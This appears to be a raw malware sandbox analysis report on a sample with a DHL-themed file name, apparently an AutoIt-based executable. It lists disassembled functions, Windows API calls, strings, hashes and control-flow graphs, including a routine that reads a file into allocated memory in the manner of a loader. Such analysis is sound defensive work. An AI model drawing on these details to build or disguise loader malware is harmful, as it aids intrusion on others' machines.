                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,007EE398), ref: 0081446A
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0081447B
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081448B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 55e01c8651c2b0a2841ff846f0497fbd92e9889b4900ada40794cb86d0773275
                                                                                    • Instruction ID: 6843445ebbda094e60468a6c9b84a07eb7745a462799e5e11d4546155c4c9fe0
                                                                                    • Opcode Fuzzy Hash: 55e01c8651c2b0a2841ff846f0497fbd92e9889b4900ada40794cb86d0773275
                                                                                    • Instruction Fuzzy Hash: 81E02073C11505A742106B38EC0D8EA775CFF45335F100B15F935D21E0E7745D4096D9
                                                                                    Function 007BE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Variable must be of type 'Object'., xrefs: 007F3E62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                    • API String ID: 0-109567571
                                                                                    • Opcode ID: 4baef52181b8b4ce6905ff7554952d49708e6aa96f35a47adf315854903fe662
                                                                                    • Instruction ID: 850c5f0860ecbbe7f088baa4f71375c9e6d2cd9dc223603bb6b06ce404827312
                                                                                    • Opcode Fuzzy Hash: 4baef52181b8b4ce6905ff7554952d49708e6aa96f35a47adf315854903fe662
                                                                                    • Instruction Fuzzy Hash: 3DA25974A00209CFCB24CF58C884BEAB7B6FF59314F248469E905AB355D779ED82CB91
                                                                                    Function 007C09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C0A5B
                                                                                    • timeGetTime.WINMM ref: 007C0D16
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C0E53
                                                                                    • Sleep.KERNEL32(0000000A), ref: 007C0E61
                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 007C0EFA
                                                                                    • DestroyWindow.USER32 ref: 007C0F06
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007C0F20
                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 007F4E83
                                                                                    • TranslateMessage.USER32(?), ref: 007F5C60
                                                                                    • DispatchMessageW.USER32(?), ref: 007F5C6E
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007F5C82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 4212290369-3242690629
                                                                                    • Opcode ID: 5685d8d69c8f308688573a01a5d017591cc7f3f5d09e25addf849c348d4b8974
                                                                                    • Instruction ID: e92e32799283ef5d9d0eb8c8db2883025d3d8d4d3167bd3aa62ffe6445f13010
                                                                                    • Opcode Fuzzy Hash: 5685d8d69c8f308688573a01a5d017591cc7f3f5d09e25addf849c348d4b8974
                                                                                    • Instruction Fuzzy Hash: 47B29F70608745DFD724DF24C888FAAB7E5BF84304F14491DE69A973A1DB78E884CB92
                                                                                    Function 00819155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00818F5F: __time64.LIBCMT ref: 00818F69
                                                                                      • Part of subcall function 007B4EE5: _fseek.LIBCMT ref: 007B4EFD
                                                                                    • __wsplitpath.LIBCMT ref: 00819234
                                                                                      • Part of subcall function 007D40FB: __wsplitpath_helper.LIBCMT ref: 007D413B
                                                                                    • _wcscpy.LIBCMT ref: 00819247
                                                                                    • _wcscat.LIBCMT ref: 0081925A
                                                                                    • __wsplitpath.LIBCMT ref: 0081927F
                                                                                    • _wcscat.LIBCMT ref: 00819295
                                                                                    • _wcscat.LIBCMT ref: 008192A8
                                                                                      • Part of subcall function 00818FA5: _memmove.LIBCMT ref: 00818FDE
                                                                                      • Part of subcall function 00818FA5: _memmove.LIBCMT ref: 00818FED
                                                                                    • _wcscmp.LIBCMT ref: 008191EF
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819824
                                                                                      • Part of subcall function 00819734: _wcscmp.LIBCMT ref: 00819837
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00819452
                                                                                    • _wcsncpy.LIBCMT ref: 008194C5
                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 008194FB
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00819511
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00819522
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00819534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                    • String ID:
                                                                                    • API String ID: 1500180987-0
                                                                                    • Opcode ID: bd7a937dda0216645e6a58aa36edb1ca5edb61d1454f08f25a6d2366f52078ce
                                                                                    • Instruction ID: b5216c5b46a54507e020209a871a039b93cd18090f7d37ccbb0294ad69c1071d
                                                                                    • Opcode Fuzzy Hash: bd7a937dda0216645e6a58aa36edb1ca5edb61d1454f08f25a6d2366f52078ce
                                                                                    • Instruction Fuzzy Hash: C8C13AB1D00219AADF21DF95CC95ADEBBBDFF45310F0040AAF609E7241EB349A858F65
                                                                                    Function 007B301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 007B3074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 007B309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B30AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 007B30CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B30DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 007B30F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B3101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: 9c1da34a1e66eca30c17da1a7bef3494b940a4921978eaa854d14554dd1669be
                                                                                    • Instruction ID: 427632984012fdd4fb9fdd0bf0827ba17e095b0cd22cb9b15d53bbce4808a88b
                                                                                    • Opcode Fuzzy Hash: 9c1da34a1e66eca30c17da1a7bef3494b940a4921978eaa854d14554dd1669be
                                                                                    • Instruction Fuzzy Hash: E43127B1D01348AFDB10CFA8DC89BDABBF4FB09310F14452AE654E62A2D3B58585CF91
                                                                                    Function 007B3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 007B3074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 007B309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B30AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 007B30CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B30DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 007B30F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B3101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: e705855ff65d6130d633a2e7c4dc0e2cf4285d352e80bd8d909594cf2854f75e
                                                                                    • Instruction ID: 507bdec99a3d830ac5f5d8150d0127ad3111bf4cfed7b6ac60eed96cb4cfbdfd
                                                                                    • Opcode Fuzzy Hash: e705855ff65d6130d633a2e7c4dc0e2cf4285d352e80bd8d909594cf2854f75e
                                                                                    • Instruction Fuzzy Hash: 6F21C5B1D11618AFDB00DFA4E989BDEBBF4FB08700F00452AFA15E62A1D7B58584CF91
                                                                                    Function 007B708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 007B4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008752F8,?,007B37AE,?), ref: 007B4724
                                                                                      • Part of subcall function 007D050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007B7165), ref: 007D052D
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007B71A8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007EE8C8
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007EE909
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 007EE947
                                                                                    • _wcscat.LIBCMT ref: 007EE9A0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                    • API String ID: 2673923337-2727554177
                                                                                    • Opcode ID: da2b44308b7f63d7576d75ed5ada06735bdddfd67fa9538123569feaa565c46d
                                                                                    • Instruction ID: 39af025dd1a70bdeb50df7b248b07235a5cc2b46e745017fddf46c9b2efa7a57
                                                                                    • Opcode Fuzzy Hash: da2b44308b7f63d7576d75ed5ada06735bdddfd67fa9538123569feaa565c46d
                                                                                    • Instruction Fuzzy Hash: E3718071519301DEC344EF65E849A9BB7E8FF98310F40092EF549872A2EB75E588CB92
                                                                                    Function 007B3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 007B3A50
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 007B3A5F
                                                                                    • LoadIconW.USER32(00000063), ref: 007B3A76
                                                                                    • LoadIconW.USER32(000000A4), ref: 007B3A88
                                                                                    • LoadIconW.USER32(000000A2), ref: 007B3A9A
                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007B3AC0
                                                                                    • RegisterClassExW.USER32(?), ref: 007B3B16
                                                                                      • Part of subcall function 007B3041: GetSysColorBrush.USER32(0000000F), ref: 007B3074
                                                                                      • Part of subcall function 007B3041: RegisterClassExW.USER32(00000030), ref: 007B309E
                                                                                      • Part of subcall function 007B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B30AF
                                                                                      • Part of subcall function 007B3041: InitCommonControlsEx.COMCTL32(?), ref: 007B30CC
                                                                                      • Part of subcall function 007B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007B30DC
                                                                                      • Part of subcall function 007B3041: LoadIconW.USER32(000000A9), ref: 007B30F2
                                                                                      • Part of subcall function 007B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007B3101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: 4cc241ad445c80c104cab3fb4c67879c7de53fc43b3586902a69d653535f5587
                                                                                    • Instruction ID: 58538e288004c5dbee1ad721b71b9f22d9b7d20deba1771319a2bc94130a20e6
                                                                                    • Opcode Fuzzy Hash: 4cc241ad445c80c104cab3fb4c67879c7de53fc43b3586902a69d653535f5587
                                                                                    • Instruction Fuzzy Hash: 1A214871D20308AFEB10DFA4EC09B9D7BB5FB08711F14452AF608A62A6D7B596908F84
                                                                                    Function 007B3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 769 7b3633-7b3681 771 7b3683-7b3686 769->771 772 7b36e1-7b36e3 769->772 773 7b3688-7b368f 771->773 774 7b36e7 771->774 772->771 775 7b36e5 772->775 776 7b374b-7b3753 PostQuitMessage 773->776 777 7b3695-7b369a 773->777 779 7ed0cc-7ed0fa call 7c1070 call 7c1093 774->779 780 7b36ed-7b36f0 774->780 778 7b36ca-7b36d2 DefWindowProcW 775->778 786 7b3711-7b3713 776->786 784 7ed154-7ed168 call 812527 777->784 785 7b36a0-7b36a2 777->785 787 7b36d8-7b36de 778->787 815 7ed0ff-7ed106 779->815 781 7b36f2-7b36f3 780->781 782 7b3715-7b373c SetTimer RegisterWindowMessageW 780->782 788 7ed06f-7ed072 781->788 789 7b36f9-7b370c KillTimer call 7b443a call 7b3114 781->789 782->786 791 7b373e-7b3749 CreatePopupMenu 782->791 784->786 808 7ed16e 784->808 792 7b36a8-7b36ad 785->792 793 7b3755-7b375f call 7b44a0 785->793 786->787 801 7ed0a8-7ed0c7 MoveWindow 788->801 802 7ed074-7ed076 788->802 789->786 791->786 797 7ed139-7ed140 792->797 798 7b36b3-7b36b8 792->798 809 7b3764 793->809 797->778 804 7ed146-7ed14f call 807c36 797->804 806 7b36be-7b36c4 798->806 807 7ed124-7ed134 call 812d36 798->807 801->786 810 7ed078-7ed07b 802->810 811 7ed097-7ed0a3 SetFocus 802->811 804->778 806->778 806->815 807->786 808->778 809->786 810->806 816 7ed081-7ed092 call 7c1070 810->816 811->786 815->778 820 7ed10c-7ed11f call 7b443a call 7b434a 815->820 816->786 820->778
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 007B36D2
                                                                                    • KillTimer.USER32(?,00000001), ref: 007B36FC
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007B371F
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007B372A
                                                                                    • CreatePopupMenu.USER32 ref: 007B373E
                                                                                    • PostQuitMessage.USER32(00000000), ref: 007B374D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: 886542d78063872f2f92950b5d8176b22f9867b2336828ec9a9df45011274fc0
                                                                                    • Instruction ID: 29f5511fd211535ffacfbd1f1066467a27cf3e64eb4abe06e5482701264f3286
                                                                                    • Opcode Fuzzy Hash: 886542d78063872f2f92950b5d8176b22f9867b2336828ec9a9df45011274fc0
                                                                                    • Instruction Fuzzy Hash: B44123B2210949EBDB205F68DC8DBFA3754FB04300F540539F606D62A6DBBDDED492A2
                                                                                    Function 007B3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                    • API String ID: 1825951767-3513169116
                                                                                    • Opcode ID: 895b3cdeb53d235cb5a4ddcaac276c389c9ff89076823b8a781527c51cb191da
                                                                                    • Instruction ID: a26b05501beda8e775f96a83700eb8c2421f143aeedb95e3597e4cd833dca7a2
                                                                                    • Opcode Fuzzy Hash: 895b3cdeb53d235cb5a4ddcaac276c389c9ff89076823b8a781527c51cb191da
                                                                                    • Instruction Fuzzy Hash: A4A14B7191021DDADB04EBA4DC99BEEB778FF14300F44042AF515B7192EF78AA48CBA0
                                                                                    Function 0149CC28 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 944 149cc28-149ccd6 call 149a638 947 149ccdd-149cd03 call 149db38 CreateFileW 944->947 950 149cd0a-149cd1a 947->950 951 149cd05 947->951 958 149cd1c 950->958 959 149cd21-149cd3b VirtualAlloc 950->959 952 149ce55-149ce59 951->952 953 149ce9b-149ce9e 952->953 954 149ce5b-149ce5f 952->954 960 149cea1-149cea8 953->960 956 149ce6b-149ce6f 954->956 957 149ce61-149ce64 954->957 961 149ce7f-149ce83 956->961 962 149ce71-149ce7b 956->962 957->956 958->952 963 149cd3d 959->963 964 149cd42-149cd59 ReadFile 959->964 965 149ceaa-149ceb5 960->965 966 149cefd-149cf12 960->966 969 149ce93 961->969 970 149ce85-149ce8f 961->970 962->961 963->952 971 149cd5b 964->971 972 149cd60-149cda0 VirtualAlloc 964->972 973 149ceb9-149cec5 965->973 974 149ceb7 965->974 967 149cf22-149cf2a 966->967 968 149cf14-149cf1f VirtualFree 966->968 968->967 969->953 970->969 971->952 977 149cda2 972->977 978 149cda7-149cdc2 call 149dd88 972->978 975 149ced9-149cee5 973->975 976 149cec7-149ced7 973->976 974->966 980 149cef2-149cef8 975->980 981 149cee7-149cef0 975->981 979 149cefb 976->979 977->952 984 149cdcd-149cdd7 978->984 979->960 980->979 981->979 985 149cdd9-149ce08 call 149dd88 984->985 986 149ce0a-149ce1e call 149db98 984->986 985->984 992 149ce20 986->992 993 149ce22-149ce26 986->993 992->952 994 149ce28-149ce2c CloseHandle 993->994 995 149ce32-149ce36 993->995 994->995 996 149ce38-149ce43 VirtualFree 995->996 997 149ce46-149ce4f 995->997 996->997 997->947 997->952
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0149CCF9
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0149CF1F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction ID: 419c186330cf35f55ae1eb63064333c95d255c3da061814820b5d3467fd2d453
                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction Fuzzy Hash: C0A11A74E00209EBDF14CFA4C894BEEBBB5BF48714F10815AE505BB291D7759A41CB94
                                                                                    Function 007B39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1075 7b39d5-7b3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A03
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3A24
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 007B3A38
                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 007B3A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
